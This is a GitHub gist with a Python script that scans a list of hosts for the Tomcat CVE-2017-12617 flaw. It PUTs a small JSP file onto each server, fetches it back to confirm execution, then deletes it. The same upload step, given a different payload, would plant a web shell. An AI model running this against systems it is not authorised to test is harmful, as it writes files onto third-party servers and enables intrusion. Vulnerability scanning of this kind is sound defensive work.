Skip to content

Instantly share code, notes, and snippets.

@klustic
Last active October 5, 2017 22:10
Show Gist options
  • Save klustic/16ee7206e27308d1bdb21108ddc179fd to your computer and use it in GitHub Desktop.
Save klustic/16ee7206e27308d1bdb21108ddc179fd to your computer and use it in GitHub Desktop.
Scan for CVE-2017-12617
import argparse
import itertools
import logging
import requests
import sys
import threading
import urllib3
class Scanner(object):
def __init__(self, hosts, loglevel=logging.WARNING):
self.hosts = set(hosts)
self.vulnerable = []
self.path = '/dmarttest.jsp'
self.headers = {'Connection':'close'}
self.logger = logging.getLogger(self.__class__.__name__)
self.logger.setLevel(loglevel)
@staticmethod
def gen(host):
return list(itertools.product(['https'], [host], [443, 8443])) + list(itertools.product(['http'], [host], [80, 8080]))
def run(self):
for _host in self.hosts:
for host in self.gen(_host):
url = '{}://{}:{}'.format(*host) + self.path
try:
self.logger.debug('{} (PUT)...'.format(url))
pr = requests.put(url + '/', headers=self.headers, data='<% out.println("hello");%>', timeout=2, verify=False)
except Exception as e:
#self.logger.debug(e)
continue
self.logger.debug('{} (PUT) -> {} {}'.format(url, pr.status_code, pr.reason))
if not (200 <= pr.status_code < 300):
continue
try:
self.logger.debug('{} (GET)'.format(url))
pg = requests.get(url, headers=self.headers, verify=False)
except Exception as e:
#self.logger.debug(e)
continue
self.logger.debug('{} (GET) -> {} {}'.format(url, pr.status_code, pr.reason))
self.logger.debug(pg.text)
if 'hello' in pg.text:
self.logger.warning('VULNERABLE: {}'.format(host))
requests.delete(url+'/', headers=self.headers, verify=False)
return
def main():
parser = argparse.ArgumentParser()
parser.add_argument('list', help='Name of a file containing a list of hosts to check')
args = parser.parse_args()
with open(args.list) as f:
hosts = f.read().split()
s = Scanner(hosts, loglevel=logging.DEBUG)
s.run()
if __name__ == '__main__':
logging.basicConfig(level=logging.WARNING)
logging.getLogger().addHandler(logging.FileHandler(sys.argv[0]+'.log'))
urllib3.disable_warnings()
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment